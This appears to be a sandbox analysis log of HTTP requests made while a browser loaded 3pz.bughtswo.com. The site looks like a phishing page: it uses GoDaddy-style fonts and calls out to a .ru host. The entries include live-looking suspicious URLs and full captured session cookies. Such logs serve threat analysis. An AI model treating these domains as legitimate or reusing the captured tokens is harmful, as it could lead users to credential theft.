Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=ecnS.mYWfjgtSPeKE.VU0essmRbbGKBeDJcHf7fAH_Y-1742259281-1.0.1.1-v_dqiAENN0EBJmyIrLQN3cxB2AWrIxXEj5vblXMAhtsxWjNV089KkK7pBCSOsnwCePZUAfAA7PF5PO7nLUgptte98O2WqxuLSl2k.SeC2dU
Source: global traffic	HTTP traffic detected: GET /phudi$g8yzhxe HTTP/1.1Host: rxivb5.qakaco.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Origin: https://3pz.bughtswo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /phudi$g8yzhxe HTTP/1.1Host: rxivb5.qakaco.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /admi/ HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://3pz.bughtswo.com/admi/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjJXZ3E4cjhCTWhlRjVVNGlBdW1JYUE9PSIsInZhbHVlIjoiZDBhU0FSOG1ZSDZ3S2FkQmo1R2FUcnh0cm9NMlFHcStSVkhhckhDdGZLcWkvOUFUWGJyc2UvTHJ4REhFaGcybkdZUmIrYmx2TU9ucGY1eHE3TW5oUXJBT0V5cUFVeDl2c1NwZzJ1NjNTU00rU1NGcStmV3lUS1JiLyszdk0xaloiLCJtYWMiOiIwZjFkMjU1Zjk5MjY5NjQwYTkwYjVkOGNmOGEwNjhiNmE0OWVkMDg3MmVlMzBkYzZkYzgyYzkwMGI1YjUyZGMxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlR5eFlwalBoR1RoSm9FRW0zc3JibHc9PSIsInZhbHVlIjoiUXN5WnlGL3BhY2J4Vmx6cGJyZVZXZUxsK3ZHUERpcVFJaVBBUG9wdGtDSjh3UWpuS0I4d05yWUp1Zkc2WkhiaFFuUEd0SUloVXAwMEIwQ2pQb0pncHE2OXA2N0RWUEErbjFmajdNMHVZaU94eUhDeHB5L3ExVmRtcnB2Z0FUck4iLCJtYWMiOiJiNzQ2NmExOWM4ZWYwMjFjZDA4YWM0OTQxNWNkY2U0MjA0ZDMzYTQwMTZlM2QyNTUyNjFmOWYwOTZjMzQxZTRlIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /soIJXNjMdD7eIx6CmpFVmuPAf6WwWoCYwrRyag HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjJXZ3E4cjhCTWhlRjVVNGlBdW1JYUE9PSIsInZhbHVlIjoiZDBhU0FSOG1ZSDZ3S2FkQmo1R2FUcnh0cm9NMlFHcStSVkhhckhDdGZLcWkvOUFUWGJyc2UvTHJ4REhFaGcybkdZUmIrYmx2TU9ucGY1eHE3TW5oUXJBT0V5cUFVeDl2c1NwZzJ1NjNTU00rU1NGcStmV3lUS1JiLyszdk0xaloiLCJtYWMiOiIwZjFkMjU1Zjk5MjY5NjQwYTkwYjVkOGNmOGEwNjhiNmE0OWVkMDg3MmVlMzBkYzZkYzgyYzkwMGI1YjUyZGMxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlR5eFlwalBoR1RoSm9FRW0zc3JibHc9PSIsInZhbHVlIjoiUXN5WnlGL3BhY2J4Vmx6cGJyZVZXZUxsK3ZHUERpcVFJaVBBUG9wdGtDSjh3UWpuS0I4d05yWUp1Zkc2WkhiaFFuUEd0SUloVXAwMEIwQ2pQb0pncHE2OXA2N0RWUEErbjFmajdNMHVZaU94eUhDeHB5L3ExVmRtcnB2Z0FUck4iLCJtYWMiOiJiNzQ2NmExOWM4ZWYwMjFjZDA4YWM0OTQxNWNkY2U0MjA0ZDMzYTQwMTZlM2QyNTUyNjFmOWYwOTZjMzQxZTRlIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/admi/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjF1cUxINTdCclRBUjBUSFByOERtRnc9PSIsInZhbHVlIjoiUzY5cHRaRzZZcCtSVEE3RWVaYlBqejNuRDdrdG9VWVdZYitiUHM1bW9iVUMvTDVtVXRLTVZyZ0F0SEJhOUZhVGJjam5iMmFaaUhFU0U0N0h3akt3R3FCOFVMRnE1SXc2TC9oSmRkSWJFK1gwejk1TURNM0tOWFBIMEhmdkNycGQiLCJtYWMiOiJjMzBiYThmNGRjNDVjZDVkMjliM2M5ZDlhZGIyYzRlYTAxMjQ1ZWQ5YWZjYjY4YTljNTM4NGIzYzRiZTljZWUzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBQcFN4dVNCK0QzQzNtQzVFZVFZZ2c9PSIsInZhbHVlIjoiUVUrRDk1Si96NGN3Z294WTN0RThUZ1NFcGJZbGdwNUZSdW90bUNrd3Njb3NJRjFqa0grUTRGZmpsbVdaelM5T1pZR0d4UlJYaEtwSDVUdVVJbnU5VnVuOXpzZHRsRUhuSzI3U1Exb2k3Wm5YY1Z3eWhudHZ1bGUwa2ViZTBHNGMiLCJtYWMiOiI0MTM0NTIyYmYyODk2OGM1YWYzZGYzNjkyNmE5YmE4MDcyZGNjNzBmMDdmMWZhNTBhMDkzNWYxZDcyMzJlNjg3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /zcjFjVbeWag4BIehEdWrtkCkgYwI2qGKbsfn5dGfq HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imlkc2srdzgxdEppd0tRZE5OL2hrTGc9PSIsInZhbHVlIjoieHYwN0xwYkVpRnJHbGVLRnNjT3phKzhaQzQyaGRYM2ZaejZ3QTVBWWY0TjlSSEJ3WjFQcDV2Y2NlSmMzTlZ4QnZjMGhQNnJxRnJLNG5Va2lxN1dkS0NEZ0J5bUhwbXlDR0EvMS9Ob0VHcStGUVBxaHNDdEhLWkdTSDVlRjNuMisiLCJtYWMiOiJiNDQ3MTdmNDMyZjRhZDYzZTliNmFmMWU3MzNhYTcxMjcwMjM0MjFhZDQyM2MzMWJiMmQwNTcxYzMxNjA1YWNlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjN5WTRWVDNqMXlWamFXSmppL0YxZlE9PSIsInZhbHVlIjoiLzhVQktrcGJmT2JQVDhGRUMyUEY0UkV6Y29yWVZ3VkFXTVF4a3kvY2ZLM2s1UStVTzBzNGp2ZVdDRW5nakRuMVNaemVCKzYzdmVJSlNlUG9lTTZVN29ySUlKT3BTQmN2T21yZXdsSDRCemtPUCtuY0t6cllFYUxYMTJxTWRmSUoiLCJtYWMiOiIwZWFhOTYzOGNhYjI1OGZmN2U5M2YxZDdjYmJmNzgyYjFhNzUxZTYwMDJlNjBlOGU4MzU5YzVmMDU5YzQ4ODZmIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://3pz.bughtswo.com/admi/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imlkc2srdzgxdEppd0tRZE5OL2hrTGc9PSIsInZhbHVlIjoieHYwN0xwYkVpRnJHbGVLRnNjT3phKzhaQzQyaGRYM2ZaejZ3QTVBWWY0TjlSSEJ3WjFQcDV2Y2NlSmMzTlZ4QnZjMGhQNnJxRnJLNG5Va2lxN1dkS0NEZ0J5bUhwbXlDR0EvMS9Ob0VHcStGUVBxaHNDdEhLWkdTSDVlRjNuMisiLCJtYWMiOiJiNDQ3MTdmNDMyZjRhZDYzZTliNmFmMWU3MzNhYTcxMjcwMjM0MjFhZDQyM2MzMWJiMmQwNTcxYzMxNjA1YWNlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjN5WTRWVDNqMXlWamFXSmppL0YxZlE9PSIsInZhbHVlIjoiLzhVQktrcGJmT2JQVDhGRUMyUEY0UkV6Y29yWVZ3VkFXTVF4a3kvY2ZLM2s1UStVTzBzNGp2ZVdDRW5nakRuMVNaemVCKzYzdmVJSlNlUG9lTTZVN29ySUlKT3BTQmN2T21yZXdsSDRCemtPUCtuY0t6cllFYUxYMTJxTWRmSUoiLCJtYWMiOiIwZWFhOTYzOGNhYjI1OGZmN2U5M2YxZDdjYmJmNzgyYjFhNzUxZTYwMDJlNjBlOGU4MzU5YzVmMDU5YzQ4ODZmIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /56mQ3hNU0OeLFsBE0cdBYhj76720 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /xyYqDiOE9Wrs7igh30 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveOrigin: https://3pz.bughtswo.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveOrigin: https://3pz.bughtswo.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveOrigin: https://3pz.bughtswo.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveOrigin: https://3pz.bughtswo.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
